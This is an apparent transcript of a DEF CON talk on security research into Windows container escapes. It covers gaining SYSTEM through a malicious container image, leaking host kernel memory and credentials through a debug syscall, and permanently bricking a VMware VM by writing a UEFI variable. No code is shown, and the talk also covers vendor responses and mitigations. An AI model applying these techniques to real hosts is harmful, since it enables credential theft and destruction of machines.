 The Cow Who Escaped the Silo by Aaron Segal. Since it is a speaker's first talk, we are going to do the Def Con tradition. But before we do that, I have two announcements. Number one, if you're sitting, please wear your masks, it's required. And the second announcement is please don't loiter or sit along the walls or the back. Just find yourself a seat, come on down, come a little closer, and enjoy the show. All right. Welcome to my talk, The Container on Windows with Skape the Silo. In this talk, I'll demonstrate how malicious Windows container image can impact the host it is running on. My name is Aaron Segal. I've been in the cybersecurity field for over seven years. Currently, I'm working as research team lead in Safe Reach Labs. My experience involved research on Windows and embedded devices. I'll start with a background of Windows process isolated containers. Then I'll continue with how to gain anti-system inside of the container. After we gained anti-system, I'll explain the method I used in order to find two vulnerabilities that can impact the host. And then we'll talk about them and show a quick demo and we'll finish with Q and A session. So the goal is to find the impact of an attacker crafted Windows container on the host it is running on. I chose this research because containers are everywhere. This attack vector of a malicious Windows container is a real world one. And reverse engineering Windows kernel is fun. So let's deep dive into Windows containers. Containers are similar to virtual machines. Each container is created from a container image which contains all the dependencies of the container. For example, the application that the container will run, the file system, host configuration, registry, and even permissions. The container image contains all the dependencies. Therefore, it is easy to manage and use it. And just like virtual machines, containers are also isolated from the host in order to validate that the container won't be able to impact it. Windows containers can be deployed in two modes. Process isolated and hyper-isolation which defines isolation that they will be executed on. Hyper-V containers are very similar to virtual machines. Each container have its own kernel. The hyper-V containers can't interact directly with the host kernel. Which means that they are more secure but it comes with computational overhead. Process isolated containers are similar to Linux containers. The entire container run from the user mode. Process isolated containers interact with the host kernel but the container is isolated from the host via multiple aspect which we will focus and talk about them in the next slides. The goal of the isolation is to prevent the container from being able to impact the host. And because the kernel is shared between the container and the host, some validations were added to the kernel to block a container from doing activities that can impact the host. In this presentation, I'll focus only on process isolated containers. When running task lists inside Windows container, we'll see lots of system processes which are related to the OS itself. Unlike Linux containers, which doesn't contain any system processes inside of it. And the reason lies in the differences between Linux kernel architecture and Windows kernel architecture. Both Linux and Windows containers are running from the user mode only in order to validate that they won't be able to impact the host. Linux kernel is monolithic. Therefore, all its basic functionality is implemented in the kernel. Unlike Windows, which some of its functionalities implemented in the user mode while other in the kernel. Therefore, Windows containers contain system services such as SVC host. So let's deep dive into how process isolated containers are implemented. There are two parts for Windows containers. The engine, which manage all the containers, load them. As you might know, Docker engine and the second part of the operating system of the Windows, which are responsible for the isolation of the container from the host. And we will focus only on the Windows party. When a new Windows container begins, it creates an environment required for the container. For example, the file system of the container, object namespace and job object and of course the processes that are going to run inside of it. Windows container isolation is separated into three parts. Job objects, namespaces and layers. I'm going to focus on bypass the kernel isolation of the job objects. So let's focus on what are job objects. Job objects were created in Windows a long, long time ago to group processes as units and manage the resources. For example, manage the CPU time, memory limits and so on. But in order to support isolation as well, the job object is required to be converted into silo. Silo object provide basic isolation, but it is not enough for containers, which require much more. So in order for a silo to have all the capabilities required to support containers, it must be converted into server silo. So any server silo is also a silo. After we converted our silo into server silo, which support the direction of resources, now we can use the process and now the processes inside of the container can use object manager, registry, network stack that we are loaded from the container image and not from the host. But this isolation is not enough because the container can interact directly with the kernel. So some validations is required to be added in the kernel itself. So let's understand how the kernel block danger assist calls. So if a container does a dangerous assist call, for example, loading driver that can impact the host, the kernel won't allow this activity. And as you can see in the slide, it's validated if the process, the thread that did the assist call is inside server silo, which means that it is inside of a container. Let's deep dive into how it detects it. When the kernel need to detect that the current process is isolated as a container, it checked for server silo or silo in the E thread or E process structs, which are the structs that represent the process and threads. The kernel need to check all the job objects which attach to the thread or the process because it is possible to attach multiple job object to a single thread or process structs. Another example of a flow in the kernel which require to validate if the process is inside of the container or not is a flow of the process list. In this flow, the kernel just skip the processes that are outside of the container. And because of that, when a process inside of the container query for all the process list, it gets only the processes that are inside of the container. So before we try to break out of the container, we need to know if we are running inside of the container. Using a single task list command, I'll show you how to detect if we are running inside the container and with rich isolation method we are using. It is possible to detect that the process is running from hyper-virt container by listing all the processes and checking if the process CXAC SVC exists. Docker D must not exist on the task list and CXAC SVC must run from session one. Similar to hyper-v-isolation, it is possible to detect process-isolated containers with all the first condition, but the last one, the third, the session ID of CXAC SVC must not be one. So after we understood that we are running inside of the container, let's detect if we are totally isolated from it. When I began my research, I found couple of indications that containers are that isolated from the host. These methods are trivial, but important for our understanding. The process IDs inside of the container and outside of the container are the same. In the slide, you can see that the process and the PID of CXAC SVC inside of the container is the same as outside of the container. When looking and comparing all the other ones, you will see that they're the same. I guess it can lead us to side-channel attack between two containers by knowing the IDs, but it is doesn't valuable enough. I want much more. So I continue to research. When running the container as container user, I noticed that ProcExper, which running outside of the container, doesn't detect the user, container user, but it did detect all the other system processes that are running inside of the container, which raised the question, why we have system processes inside of the container and do they have the same permissions as system processes outside of the container? So basically, system processes inside of the container have almost the same permissions, but if there are isolation checks, as I showed you before, we can't do that. So we need to find a way to bypass that. So before we jump to how to escape the container, let's gain system permissions. When running Docker run command with a user flag of container user, which is a weak user, I would have expected we will run only container user, which weak processes. But if you will see the boot process, lots of system processes are starting from the container image. The only process running as a user we defined is the CMD, which we executed. Which means that our process can communicate with system processes. And more interestingly, these processes are loaded from the container image, which we control. So if you can control the executables, we can gain anti-system. So it doesn't matter with which user's container we run, we can get system permissions. But how exactly can we do it? In order to craft a container image that will run as system always, we need to follow just these four steps. First, run the container as system, to add our backdoor inside of it. Then we will create a service that will run as system. We'll start it and convert the container into container image that we can deploy in future use. But this method is not the only one. It is possible to do it with much more than this method. For example, we can override system 32 executables that are found in the image, use the DLL side loading and modify the configuration, the registry, and even changing the permissions of the container user to have administrator permissions. So we gained system permissions inside of the container, but we can't do anything we want yet because we are blocked, we can load DLL drivers, sorry, and we are isolated from the host. We can't access the file system. So in order to break the isolation, we need to learn first about past vulnerabilities. I'm going to explain two examples of past container escape vulnerabilities. Each one of them represent a different method to look for in container escape vulnerabilities. The first method to look are APIs that Microsoft just forgot to block them from the container. Unit 42 found a vulnerability in object manager symbolic link that let process inside of the container access any hard drive that they want. The second method is to try to bypass Microsoft mitigations. Gems for sure found a way to bypass the kernel validation of the server silo by creating a new silo object, which is not a server silo. Microsoft added the support for containers after most of the kernel was implemented. Therefore, I chose the first method to look for syscalls that Microsoft just forgot to block. I didn't put a lot of effort right to bypass existing mitigations and validations. It looks much harder and less cost effective. So in my research, I looked for vulnerable syscalls but there are over 500 one. It is not possible to go over all of them manually. So I had to find to narrow this attack vector into much better and more interesting functions. So as I said before, it has to be a syscall because otherwise we can't interact with it. The second, this syscall must not have isolation checks which means that Microsoft may or may not forgot to add the isolation check. And the third one is tricky. If the syscall must require system permissions, the higher the privileges, the better. Then it assured that the impact of the syscall will be major infolik or let us impact the host drastically. After I built this recipe, my life become much easier and I began to find vulnerable functions. I did a quick theory of syscalls that match the pattern and the syscall anti-query system information caught my attention. This function contains a huge switch case over the parameter system information class which is an enum that contains about 200 options. I could not go over all of them manually. So but luckily I had symbols. I knew which one does what. So I wrote a small code, go over all the interesting ones and I found an interesting option. If I called the system call with the enum value of system handling information, it returned to me a list of all the handles and addresses of the objects from all the processes on the host. It is not possible to use these handles or addresses because we can't open processes that are outside of the container and we can't also duplicate that. So what I found is a minor infolik. We can gain all the process ideas on the host. But I want much more, so I continue to look. Additional interesting syscall that matched the pattern was anti-system debug control, which sound much better. Anti-system debug control is similar to the previous function. It is huge and enumerate over the enum sysdebar command. The syscall called multiple interesting functions. For example, enable kernel debugger. But all these options were disabled if the kernel debugger is not enabled. If even enable kernel debugger requires that. But all of them except to user dump which won't give me any actual value because I need a handle to user mode to a process that I can open only processes inside of the container and kernel dump. That sound much interesting. So let's understand how to do kernel dump using the syscall. In order to do kernel dump, I need to fill the struct sysdebug live dump command control which contains two interesting variables. Handle to a file, easy, and flags to the dump. Which specify what the dump will contain in the kernel. I took a source code from the internet that triggers the kernel dump, changed it a bit, and now I can dump the entire kernel from inside the container. But let's understand what I can dump. So the flags that control which information will be included in the kernel dump are listed here. They are undocumented. And the most interesting ones are dump hyper repages and user space memory pages because of LLAS. I attached VM kernel debugger and I tried to do a kernel dump from inside of the container and it worked. I managed to dump all user processes and including LLAS on the host. But on a clean Windows machine, dumping user mode is not possible. And the root cause again, is that kernel debugger is not enabled. All the other flags worked as expected without kernel debugger. So I can dump the entire kernel, I can dump additional pages, but I can dump the user mode processes. So, but I still want to access passwords on the host. So let's understand how to access them. There are multiple ways to access passwords on the host without LLAS. The first one is via the command line. The kernel dump contains all the information about all the processes on the host, including the command line argument. So if you pass a password in the command line argument, all the environment variables on the process, so I can access it from inside the container. Another way that sometimes passwords are stored in the registry, which we can also access using the kernel dump. And if the kernel debugger is enabled, it is possible to dump LLAS directly and access all the passwords from in. And of course, kernel dump from inside of the container can discover much more. It can discover which IDRs and security product are running on the host, event on Windows, stack traces, kernel memory, and much more. So additional vulnerability I found is related to the UEFI. So in order to understand the impact and how can we use this vulnerability, I'll give a bit of background. When we boot a new Windows PC, it probably boot in this following sequence. First, the UEFI init the CPU, loads the UEFI device and drivers. Then, the UEFI loads the configuration from the environment memory in order to know how to continue the boot. Then, the execution forwards from the UEFI to the Windows. On the third step, Windows begins the boot sequence. Windows pulls the configuration from BCD, which are stored in the UEFI partition. Then it continues the rest of the boot until Windows completes the boot. Let's focus on the environment storage. The UEFI environment contains the configuration of the UEFI. These configurations are not stored on the hard disk itself, but on a chip in the motherboard. This memory is not shared between the operating system and the UEFI, and there are multiple namespaces in the environment. So in order to access a specific variable there, we need to know its good, its namespace, and the variable name. Two examples of major variables are found, are boot and boot order. Boot is a variable that defines the UEFI how to boot using a specific method. For example, boot from hard disk or boot from CD. The content of the boot variable sometimes points to a file on the hard disk, but they are stored in the UEFI partition on the fetch 32. So the container can't access them, so we can't modify them. The boot order defined in which order the UEFI will try to boot, whether it's going to try to boot from the CD first, hard disk, network, and so on. There are multiple types and flags for the environment variables, which can be classified into two sections. Storage method, which defines whether the environment variable is going to be volatile or not. And the access, when we can access the variable, whether we can access it only on the boot, or we can access it on the OS part from the windows itself. So let's jump to the vulnerability itself. This vulnerability is related to multiple syscalls, which are all related to the environment. So the first capability we want is listing all the environment variables on the host. We can do that using the syscalls anti-enumerate system environment value, which let us discover all the environment variables from the host, but it is possible to do that from the container itself. But this operation won't be useful without reading them, which lead us to the second syscall, anti-query system environment value, which let us read a value from a specific environment variable, which is stored on the host. Microsoft didn't block this syscall from the container as well. And the last capability we need is to read and write environment variable, which means that we have read, write, and listing all the environment variables. So it raised the question, what can we do with it? After the container is killed and start over, sometimes the storage is reverted, which means it is not possible to store permanent data. Writing and reading environment will let us store persistent storage that will store between container reboots, even reboots of the host, and because environment is stored on the motherboard itself, we can even stay after four months. Additional impact is communication between two containers, isolated containers. Because both of the containers can read and write from the same memory variables on the environment, we can exfiltrate data between them. And the most interesting impact is triggering permanent denial of service of the host. Because the UEFI parts the environment variables, it is possible to change some of them to make the host unbootable forever. Changing the variables boot and boot order, which we talked about before, doesn't prevent the UEFI from booting Windows because of backup configurations, which we cannot touch. Therefore, I had to look for other flows and variables. Another environment variable exists on some UEFI is HDDP. Writing non-valid value to it will do the job, and it will cause permanent denial of service to the host. The impact of this writing will be, will happen only after the host restart itself. It will shut down as expected. Everything will work perfectly. And when the host will try to boot up again, it won't be possible. The UEFI won't be able to pass the execution to the Windows part. So it doesn't matter how much restart you will do to the machine, to the host. It won't start. The impacted UEFI was VMware UEFI. So if we will run Windows container inside Windows VM, running in Windows machine, for example, ES6 or VMware Workstation, the UEFI of the Windows VM is a vulnerable component. When writing the HDDP variable from the container, it will cause permanent denial of service to the VMware VM. Sadly, the host machine won't be impacted on. So let's deep dive and understand the root cause. The UEFI built from multiple parts. The vulnerable part is BDS driver, which is responsible for selecting which device to boot from. The root cause in the BDS DXE is that it reads the HDDP variable, and because it is invalid, it called to assert UEFI error. This function stops the boot sequence and cause the UEFI to loop, to cause a loop, enter into loop, that it won't be possible to enter into, or trigger a break point, which no debugger will be attached to it, so the UEFI will stop. Which means that the boot sequence will stop, and it won't be possible to do it. So let's jump to a demo containing a chain of vulnerabilities. We'll do the privilege escalation using a malicious Windows container, and how we can cause permanent denial of service to the VMware VM. So here you can see a container that we are about to start, which will run with weak privileges with a malicious, and it will load a malicious Windows container. So you can see that the user doesn't have admin privileges, but there is a background service that I created before, and it reads and writes to the input file and output file. So we wrote the who am I command, and we will read the output, and you can see that we have system. And if we will override the HTTP variable of the envirom, it is possible to see that we override that by six time a. So now only what we need to do is wait for the restart. So you can see that it will restart as expected. No special actions, Windows won't detect that as an issue. And once it will start up again, the Windows part won't be able to boot. The UEFI will just be stuck on that. Here the UEFI start in its resources, and when it will continue, that's it. We won't pass this step. So let us explain how the demo worked. So before the demo, I created a malicious Windows container, it contains a vector service, the trial and see system. It read and write from the input file and output file. And when we executed using this service, the envirom executable, which overwrites the HTTP variable and restarted the machine, which triggered the permanent denial service. So let's jump to mitigating this. It is not easy to mitigate this vulnerabilities without official patch for Microsoft. But there are few work rounds that we can do. For example, instead of using process isolated containers, which are easy to use and doesn't have overhead of computational power, we can use the Hyper-V isolation, which costs more in performance, but it is not vulnerable to the UEFI and the kernel vulnerabilities. Another flow is to run only signed executables, which you can trust, and therefore you want fear of malicious Windows containers, but it's really hard to do that. And another one is to assume that container image will run a system and use it in the topology, the network topology. Container image scanning is used in order to ensure that no such issues, such as a privilege escalation in a Windows container, exist on the container. So I tested my container with a privilege escalation and they didn't detect that, but only after I dug into the website I discovered that they don't support Windows container officially, but they did mark the container as clean. So if you are using container images and you scan them, please assure that the product is support Windows containers. Sadly, I could not put my hands on the Windows container image scanning product that support Windows containers. Regarding the vendor response, basically Microsoft said that because administrators can start containers, the privilege escalation that we can gain anti-system inside of the container is not a vulnerability. Regarding the kernel dump, that we can dump the kernel from inside of the container, they answered that it is not a vulnerability because we need administrator user inside of the container, which we gained in the privilege escalation, but they do plan to fix it in the future. Regarding the open NVRAM syscalls, which we can write, read, and list NVRAM variables, Microsoft defined this attack as moderate denial of service which is outside of the Windows security update, but they will fix it. And regarding the VMware UEFI HTTP, which caused the permanent denial of service to the host, VMware treated it as functional issue because it impacts only the VM itself and requires admin privileges from inside, but they do plan to fix it in future releases. I uploaded all the tools and modifications that I use, how to do privilege escalation and create a malicious Windows container to GitHub. In addition, in this repo, you can use the code that does the kernel dump from inside of the container and manual to cause permanent denial of service to VMware VM. So some acknowledgement, I would like to thank Mickey for helping me reversing the VMware UEFI and additional researchers that I based my research on top of theirs. Thank you for joining. The Q&A will be happening there, so thank you.